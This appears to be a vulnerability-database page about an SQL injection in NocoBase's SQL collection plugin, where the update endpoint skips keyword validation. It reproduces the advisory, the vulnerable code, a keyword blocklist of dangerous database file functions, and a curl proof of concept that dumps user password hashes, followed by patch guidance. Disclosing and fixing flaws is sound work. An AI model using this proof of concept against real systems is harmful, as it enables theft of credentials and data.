What is the CVSS score of EUVD-2026-28318?

EUVD-2026-28318 has a CVSS 3.1 base score of 7.2 (High). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H. EPSS exploitation probability: 0.2%.

Which versions of NocoBase SQL Collection Plugin are affected by EUVD-2026-28318?

NocoBase SQL plugin contains an authentication bypass in collection update operations that allows authorized collection managers to inject arbitrary SQL queries and exfiltrate sensitive data…. A patch is available.

Is there a public PoC exploit available for EUVD-2026-28318?

Yes, a public proof-of-concept exploit is available for EUVD-2026-28318. Prioritise patching immediately. EPSS: 0.2%.

How to fix or mitigate EUVD-2026-28318?

Within 24 hours: Identify all NocoBase deployments running plugin-collection-sql and document current versions. Within 7 days: Apply vendor patch via GitHub commit 851aee5 (PR #9134) to all affected instances and verify checkSQL() validation is present on both collection creation and update endpoints. Within 30 days: Audit collection manager role assignments, restrict permissions to fully-trusted administrators only, and review SQL collection query logs for suspicious activity.

NocoBase SQL Collection Plugin EUVD-2026-28318

| CVE-2026-41641 HIGH

SQL Injection (CWE-89)

2026-04-22 https://github.com/nocobase/nocobase

GHSA-wrwh-c28m-9jjh

SQLi PostgreSQL Privilege Escalation

7.2

CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY

7.2 HIGH

AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

High

User Interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Analysis Generated

Apr 23, 2026 - 06:53 vuln.today

Analysis Generated

Apr 22, 2026 - 20:31 vuln.today

Patch released

Apr 22, 2026 - 20:31 nvd

Patch available

PoC Detected

Apr 22, 2026 - 20:07 vuln.today

Public exploit code

CVE Published

Apr 22, 2026 - 20:07 nvd

HIGH 7.2

DescriptionGitHub Advisory

Summary

The checkSQL() validation function that blocks dangerous SQL keywords (e.g., pg_read_file, LOAD_FILE, dblink) is applied on the collections:create and sqlCollection:execute endpoints but is entirely missing on the sqlCollection:update endpoint. An attacker with collection management permissions can create a SQL collection with benign SQL, then update it with arbitrary SQL that bypasses all validation, and query the collection to execute the injected SQL and exfiltrate data.

Affected component: @nocobase/plugin-collection-sql Affected versions: <= 2.0.32 (confirmed) Minimum privilege: Collection management permissions (pm.data-source-manager.collection-sql snippet)

Vulnerable Code

`checkSQL` is applied on create and execute

packages/plugins/@nocobase/plugin-collection-sql/src/server/resources/sql.ts

javascript

// Line 51-60 - execute action: checkSQL IS called
execute: async (ctx: Context, next: Next) => {
    const { sql } = ctx.action.params.values || {};
    try { checkSQL(sql); } catch (e) { ctx.throw(400, ctx.t(e.message)); }
    // ...
}

`checkSQL` is NOT applied on update

javascript

// Line 105-118 - update action: checkSQL IS NOT called
update: async (ctx: Context, next: Next) => {
    const transaction = await ctx.app.db.sequelize.transaction();
    try {
        const { upRes } = await updateCollection(ctx, transaction);
        // No checkSQL() call anywhere in this path!
        const [collection] = upRes;
        await collection.load({ transaction, resetFields: true });
        await transaction.commit();
    }
    // ...
}

The `checkSQL` function itself

packages/plugins/@nocobase/plugin-collection-sql/src/server/utils.ts:10-28

javascript

export const checkSQL = (sql: string) => {
  const dangerKeywords = [
    'pg_read_file', 'pg_write_file', 'pg_ls_dir', 'LOAD_FILE',
    'INTO OUTFILE', 'INTO DUMPFILE', 'dblink', 'lo_import', // ...
  ];
  sql = sql.trim().split(';').shift();
  if (!/^select/i.test(sql) && !/^with([\s\S]+)select([\s\S]+)/i.test(sql)) {
    throw new Error('Only supports SELECT statements or WITH clauses');
  }
  if (dangerKeywords.some((keyword) => sql.toLowerCase().includes(keyword.toLowerCase()))) {
    throw new Error('SQL statements contain dangerous keywords');
  }
};

PoC

bash

TOKEN="<admin_jwt_token>"
# Step 1: Create collection with valid SQL (passes checkSQL)
curl -s http://TARGET:13000/api/collections:create \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "exfil_collection",
    "sql": "SELECT 1 as id",
    "fields": [{"name": "id", "type": "integer"}],
    "template": "sql"
  }'
# Step 2: Verify checkSQL blocks dangerous SQL on create
curl -s http://TARGET:13000/api/collections:create \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"name": "blocked", "sql": "SELECT pg_read_file('\''/etc/passwd'\'')", "fields": [], "template": "sql"}'
# Returns: 400 "SQL statements contain dangerous keywords"
# Step 3: Update with dangerous SQL - bypasses checkSQL entirely
curl -s "http://TARGET:13000/api/sqlCollection:update?filterByTk=exfil_collection" \
  -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "sql": "SELECT * FROM users",
    "fields": [
      {"name": "id", "type": "integer"},
      {"name": "email", "type": "string"},
      {"name": "password", "type": "string"}
    ]
  }'
# Returns: 200 OK - no validation!
# Step 4: Query the collection to exfiltrate data
curl -s "http://TARGET:13000/api/exfil_collection:list" \
  -H "Authorization: Bearer $TOKEN"
# Returns: all rows from users table including password hashes

Impact

Confidentiality: Arbitrary SELECT queries exfiltrate any table. Confirmed dump of the users table including password hashes.
Integrity/Availability: Although checkSQL strips after the first semicolon, dangerous single-statement operations like SELECT ... INTO, subqueries with side effects, or database-specific functions (pg_read_file, LOAD_FILE, dblink) are all accessible through the update bypass.
Privilege escalation: On PostgreSQL, dblink enables lateral movement to other databases. pg_read_file reads arbitrary files from the database server filesystem.

Fix Suggestion

Add checkSQL() to the update action. The one-line fix:

javascript

   update: async (ctx: Context, next: Next) => {
       const { sql } = ctx.action.params.values || {};
       if (sql) {
           try { checkSQL(sql); } catch (e) { ctx.throw(400, ctx.t(e.message)); }
       }
       // ... existing code ...
   }

Centralize validation in middleware rather than per-action. Apply checkSQL in the resource middleware for any action that accepts a sql field, so future actions cannot accidentally skip it.
Strengthen the blocklist. The current list is missing COPY (PostgreSQL file I/O and RCE), CREATE, ALTER, DROP, GRANT, SET, and EXECUTE. Consider switching to a parser-based allowlist that only permits SELECT and WITH ... SELECT at the AST level rather than relying on keyword blocklisting.

AnalysisAI

SQL injection in NocoBase plugin-collection-sql allows authenticated users with collection management permissions to bypass validation controls and execute arbitrary SQL queries. The checkSQL() function blocks dangerous keywords on collection creation and execution but is completely absent from the update endpoint, enabling attackers to create benign SQL collections then modify them with malicious queries to exfiltrate sensitive data including user credentials. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access

Authenticate with collection manager credentials

Delivery

Create SQL collection with benign SELECT query

Exploit

POST malicious SQL via unvalidated update endpoint

Execution

Query collection through standard API

Impact

Exfiltrate database contents or filesystem data

Access

Authenticate with collection manager credentials

Delivery

Create SQL collection with benign SELECT query

Exploit

POST malicious SQL via unvalidated update endpoint

Execution

Query collection through standard API

Impact

Exfiltrate database contents or filesystem data

Vulnerability AssessmentAI

Exploitation	Requires authenticated access with collection management permissions, specifically the pm.data-source-manager.collection-sql permission scope in NocoBase's role-based access control system. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	CVSS 7.2 (High) with vector AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H reflects network-accessible exploitation requiring high privileges (collection management role). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker with collection management permissions (often granted to data modelers or departmental admins in NocoBase deployments) authenticates to the platform and creates a SQL collection named 'reports' with benign SQL like 'SELECT 1 as id' that passes checkSQL validation. Minutes later, they issue an update request to the sqlCollection:update endpoint, modifying the SQL to 'SELECT id, email, password FROM users' with matching field definitions. …
Remediation	Apply vendor-released patch from NocoBase GitHub PR #9134 (commit 851aee543efa894142e0f7be03eb55d9cec06a91) available at https://github.com/nocobase/nocobase/pull/9134. … Detailed patch versions, workarounds, and compensating controls in full report.